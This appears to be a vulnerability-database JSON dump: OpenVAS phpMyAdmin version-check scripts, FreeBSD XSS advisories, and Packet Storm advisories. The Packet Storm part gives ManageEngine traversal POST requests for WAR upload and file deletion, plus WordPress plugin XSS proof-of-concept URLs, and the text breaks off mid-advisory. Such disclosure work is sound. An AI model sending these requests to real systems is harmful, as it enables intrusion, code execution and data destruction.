June14 (Linux))", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4349"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310112011", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112011", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_xss_vuln02_jun14_lin.nasl 11863 2018-10-12 09:42:02Z mmartin $\n#\n# phpMyAdmin Multiple XSS Vulnerabilities - 2 - June14 (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112011\");\n script_version(\"$Revision: 11863 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 11:42:02 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 10:07:21 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2014-4349\");\n script_bugtraq_id(68205);\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"phpMyAdmin Multiple XSS Vulnerabilities - 2 - June14 (Linux))\");\n\n script_category(ACT_GATHER_INFO);\n\n 
script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks the banner.\");\n\n script_tag(name:\"insight\", value:\"Multiple XSS vulnerabilities allow remote authenticated users to inject arbitrary web script\n or HTML via a crafted table name that is improperly handled after a (1) hide or (2) unhide action.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin versions 4.1.x prior to 4.1.14.1 and 4.2.x prior to 4.2.4.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.1.14.1 or 4.2.4.\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-3/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version =~ \"^4\\.1\\.\") {\n if (version_is_less(version: version, test_version: \"4.1.14.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.1.14.1\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^4\\.2\\.\") {\n if (version_is_less(version: version, test_version: \"4.2.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.2.4\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(0);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:22", "description": "phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin 
Multiple XSS Vulnerabilities - 2 - June14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4349"], "modified": "2018-09-19T00:00:00", "id": "OPENVAS:1361412562310112010", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112010", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_xss_vuln02_jun14_win.nasl 11474 2018-09-19 11:38:50Z mmartin $\n#\n# phpMyAdmin Multiple XSS Vulnerabilities - 2 - June14 (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112010\");\n script_version(\"$Revision: 11474 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-19 13:38:50 +0200 (Wed, 19 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 10:07:21 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2014-4349\");\n script_bugtraq_id(68205);\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"phpMyAdmin Multiple XSS Vulnerabilities - 2 - June14 (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks the banner.\");\n\n script_tag(name:\"insight\", value:\"Multiple XSS vulnerabilities allow remote authenticated users to inject arbitrary web script\n or HTML via a crafted table name that is improperly handled after a (1) hide or (2) unhide action.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin versions 4.1.x prior to 4.1.14.1 and 4.2.x prior to 4.2.4.\");\n\n 
script_tag(name:\"solution\", value:\"Update to version 4.1.14.1 or 4.2.4.\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-3/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version =~ \"^4\\.1\\.\") {\n if (version_is_less(version: version, test_version: \"4.1.14.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.1.14.1\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^4\\.2\\.\") {\n if (version_is_less(version: version, test_version: \"4.2.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.2.4\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(0);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe phpMyAdmin development team reports:\n\nSelf-XSS due to unescaped HTML output in database\n\t structure page.\nWith a crafted table comment, it is possible to trigger\n\t an XSS in database structure page.\n\n\nSelf-XSS due to unescaped HTML output in database\n\t triggers page.\nWhen navigating into the database triggers page, it is\n\t possible to trigger an XSS with a crafted trigger\n\t name.\n\n\nMultiple XSS in AJAX confirmation messages.\nWith a crafted column name it is possible to trigger an\n\t XSS when dropping the column in table structure page. 
With\n\t a crafted table name it is possible to trigger an XSS when\n\t dropping or truncating the table in table operations\n\t page.\n\n\nAccess for an unprivileged user to MySQL user list.\nAn unprivileged user could view the MySQL user list and\n\t manipulate the tabs displayed in phpMyAdmin for them.\n\n\n", "cvss3": {}, "published": "2014-07-18T00:00:00", "type": "freebsd", "title": "phpMyAdmin -- multiple XSS vulnerabilities, missing validation", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4954", "CVE-2014-4955", "CVE-2014-4986", "CVE-2014-4987"], "modified": "2014-07-20T00:00:00", "id": "3F09CA29-0E48-11E4-B17A-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/3f09ca29-0e48-11e4-b17a-6805ca0b3d42.html", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe phpMyAdmin development team reports:\n\nMultiple XSS vulnerabilities in browse table, ENUM\n\t editor, monitor, query charts and table relations pages.\n With a crafted database, table or a primary/unique key\n\t column name it is possible to trigger an XSS when dropping\n\t a row from the table. With a crafted column name it is\n\t possible to trigger an XSS in the ENUM editor dialog. With\n\t a crafted variable name or a crafted value for unit field\n\t it is possible to trigger a self-XSS when adding a new\n\t chart in the monitor page. With a crafted value for x-axis\n\t label it is possible to trigger a self-XSS in the query\n\t chart page. 
With a crafted relation name it is possible to\n\t trigger an XSS in table relations page.\n\n\nXSS in view operations page.\nWith a crafted view name it is possible to trigger an\n\t XSS when dropping the view in view operation page.\n\n\n", "cvss3": {}, "published": "2014-08-17T00:00:00", "type": "freebsd", "title": "phpMyAdmin -- XSS vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2014-08-17T00:00:00", "id": "FBB01289-2645-11E4-BC44-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/fbb01289-2645-11e4-bc44-6805ca0b3d42.html", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe phpMyAdmin development team reports:\n\nSelf-XSS due to unescaped HTML output in recent/favorite\n\t tables navigation.\nWhen marking a crafted database or table name as\n\t favorite or having it in recent tables, it is possible to\n\t trigger an XSS.\nThis vulnerability can be triggered only by someone who\n\t logged in to phpMyAdmin, as the usual token protection\n\t prevents non-logged-in users from accessing the required\n\t form.\n\n\nSelf-XSS due to unescaped HTML output in navigation items\n\t hiding feature.\nWhen hiding or unhiding a crafted table name in the\n\t navigation, it is possible to trigger an XSS.\nThis vulnerability can be triggered only by someone who\n\t logged in to phpMyAdmin, as the usual token protection\n\t prevents non-logged-in users from accessing the 
required\n\t form.\n\n\n", "cvss3": {}, "published": "2014-06-20T00:00:00", "type": "freebsd", "title": "phpMyAdmin -- two XSS vulnerabilities due to unescaped db/table names", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4348", "CVE-2014-4349"], "modified": "2014-06-24T00:00:00", "id": "C4892644-F8C6-11E3-9F45-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/c4892644-f8c6-11e3-9f45-6805ca0b3d42.html", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe phpMyAdmin development team reports:\n\nXSRF/CSRF due to DOM based XSS in the micro history feature.\nBy deceiving a logged-in user to click on a crafted URL,\n\t it is possible to perform remote code execution and in some\n\t cases, create a root account due to a DOM based XSS\n\t vulnerability in the micro history feature.\n\n\n", "cvss3": {}, "published": "2014-09-13T00:00:00", "type": "freebsd", "title": "phpMyAdmin -- XSRF/CSRF due to DOM based XSS in the micro history feature", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-09-13T00:00:00", "id": "CC627E6C-3B89-11E4-B629-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/cc627e6c-3b89-11e4-b629-6805ca0b3d42.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe phpMyAdmin development team reports:\n\nWith a crafted ENUM value it is possible to trigger an\n\t XSS in table search and table structure pages. This\n\t vulnerability can be triggered only by someone who is\n\t logged in to phpMyAdmin, as the usual token protection\n\t prevents non-logged-in users from accessing the required\n\t pages.\n\n\n", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "freebsd", "title": "phpMyAdmin -- XSS vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-01T00:00:00", "id": "3E8B7F8A-49B0-11E4-B711-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/3e8b7f8a-49b0-11e4-b711-6805ca0b3d42.html", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:53", "description": "", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "packetstorm", "title": "ManageEngine Code Execution / File Deletion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2014-09-29T00:00:00", "id": "PACKETSTORM:128474", "href": 
"https://packetstormsecurity.com/files/128474/ManageEngine-Code-Execution-File-Deletion.html", "sourceData": "`Hi, \n \nThis is the fifth part of the ManageOwnage series. For previous parts, see: \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \n \nThis time we have a file upload with directory traversal as well as an \narbitrary file deletion vulnerability. The file upload can be abused \nto deliver a WAR payload in the Tomcat webapps directory, which will \ndeploy a malicious Servlet allowing the attacker to execute arbitrary \ncode. \n \nDetails are below, and the usual Metasploit module has been submitted \nand should be available soon (see pull request \nhttps://github.com/rapid7/metasploit-framework/pull/3903). \n \n \n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \n \n>> Background on the affected products: \n\"ManageEngine OpManager is a network and data center infrastructure \nmanagement software that helps large enterprises, service providers \nand SMEs manage their data centers and IT infrastructure efficiently \nand cost effectively. Automated workflows, intelligent alerting \nengines, configurable discovery rules, and extendable templates enable \nIT teams to setup a 24x7 monitoring system within hours of \ninstallation.\" \n \n\"Social IT Plus offers a cascading wall that helps IT folks to start \ndiscussions, share articles and videos easily and quickly. Other team \nmembers can access it and post comments and likes on the fly.\" \n \n\"Managing mission critical business applications is now made easy \nthrough ManageEngine IT360. 
With agentless monitoring methodology, \nmonitor your applications, servers and databases with ease. Agentless \nmonitoring of your business applications enables you high ROI and low \nTOC. With integrated network monitoring and bandwidth utilization, \nquickly troubleshoot any performance related issue with your network \nand assign issues automatically with ITIL based ServiceDesk \nintegration.\" \n \n \n>> Technical details: \n#1 \nVulnerability: Remote code execution via WAR file upload \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \n \na) \nCVE-2014-6034 \nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war \nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; \nIT360 v? to v10.4 \nA Metasploit module that exploits this vulnerability has been released. \n \nb) \nCVE-2014-6035 \nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war \nAffected versions: OpManager v? to v11.3 \n \n \n#2 \nVulnerability: Arbitrary file deletion \nCVE-2014-6036 \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 \nv? to v10.4 \n \nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini \n \n \n>> Fix: \nUpgrade to OpManager 11.3, then install the patch in \nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix \nThis patch can be applied to all the applications but only for the \nlatest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4). \nManageEngine have indicated that the soon to be released OpManager \nversion 11.4 might not have the fix as the release is almost ready. \nThey are planning to include the fix in OpManager version 11.5 which \nshould be released sometime in late November or December 2014. 
No \nindication was given for when fixed versions of IT360 and Social IT \nPlus will be released. \n \nA copy of the advisory above can be found at my repo: \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt \n \nRegards, \nPedro \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128474/meopmanager-execlfi.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:18:53", "description": "", "published": "2014-10-10T00:00:00", "type": "packetstorm", "title": "WordPress Google Calendar Events 2.0.1 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7138"], "modified": "2014-10-10T00:00:00", "id": "PACKETSTORM:128626", "href": "https://packetstormsecurity.com/files/128626/WordPress-Google-Calendar-Events-2.0.1-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23235 \nProduct: Google Calendar Events WordPress plugin \nVendor: Phil Derksen \nVulnerable Version(s): 2.0.1 and probably prior \nTested Version: 2.0.1 \nAdvisory Publication: September 17, 2014 [without technical details] \nVendor Notification: September 17, 2014 \nVendor Patch: October 7, 2014 \nPublic Disclosure: October 8, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-7138 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in Google Calendar Events WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin. 
\n \n \n1) Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin: CVE-2014-7138 \n \nInput passed via the \"gce_feed_ids\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://wordpress/wp-admin/admin-ajax.php?action=gce_ajax&gce_type=page&gce_feed_ids=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Google Calendar Events 2.0.4 \n \nMore Information: \nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/df1fe1d71f8ce9496cc601c96839c474e49db91d \nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/a701ceeb410bdda9d96c9d3d12104630df5d5b43 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23235 - https://www.htbridge.com/advisory/HTB23235 - Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin. \n[2] Google Calendar Events WordPress plugin - http://philderksen.com/ - Parses Google Calendar feeds and displays the events as a calendar grid or list on a page, post or widget. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 
\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128626/wpgce-xss.txt"}, {"lastseen": "2016-12-05T22:19:36", "description": "", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "packetstorm", "title": "WordPress Contact Form DB 2.8.13 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7139"], "modified": "2014-10-10T00:00:00", "id": "PACKETSTORM:128625", "href": "https://packetstormsecurity.com/files/128625/WordPress-Contact-Form-DB-2.8.13-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23233 \nProduct: Contact Form DB WordPress plugin \nVendor: Michael Simpson \nVulnerable Version(s): 2.8.13 and probably prior \nTested Version: 2.8.13 \nAdvisory Publication: September 17, 2014 [without technical details] \nVendor Notification: September 17, 2014 \nVendor Patch: September 25, 2014 \nPublic Disclosure: October 8, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-7139 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n 
\n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Contact Form DB WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin installed. \n \n1) Two Cross-Site Scripting (XSS) Vulnerabilities in Contact Form DB WordPress Plugin: CVE-2014-7139 \n \n1.1 Input passed via the \"form\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&form=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n1.2 Input passed via the \"enc\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&enc=%27%22%29;%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Contact Form DB 2.8.16. 
\n \nMore Information: \nhttps://wordpress.org/plugins/contact-form-7-to-database-extension/changelog/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23233 - https://www.htbridge.com/advisory/HTB23233 - Two XSS in Contact Form DB WordPress Plugin. \n[2] Contact Form DB WordPress plugin - http://wordpress.org/plugins/contact-form-7-to-database-extension/ - Save form submissions to the database from Contact Form 7, Fast Secure Contact Form, JetPack Contact Form and Gravity Forms. Includes exports and short codes. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. 
\n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128625/wpcontactformdb-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-05T22:15:29", "description": "", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "packetstorm", "title": "WordPress Photo Gallery 1.1.30 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6315"], "modified": "2014-10-01T00:00:00", "id": "PACKETSTORM:128518", "href": "https://packetstormsecurity.com/files/128518/WordPress-Photo-Gallery-1.1.30-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23232 \nProduct: Photo Gallery WordPress plugin \nVendor: http://web-dorado.com/ \nVulnerable Version(s): 1.1.30 and probably prior \nTested Version: 1.1.30 \nAdvisory Publication: September 10, 2014 [without technical details] \nVendor Notification: September 10, 2014 \nVendor Patch: September 10, 2014 \nPublic Disclosure: October 1, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-6315 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered three vulnerabilities in Photo Gallery WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Cross-Site Scripting (XSS) in Photo Gallery WordPress plugin: CVE-2014-6315 \n \n1.1 Input passed via the \"callback\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. 
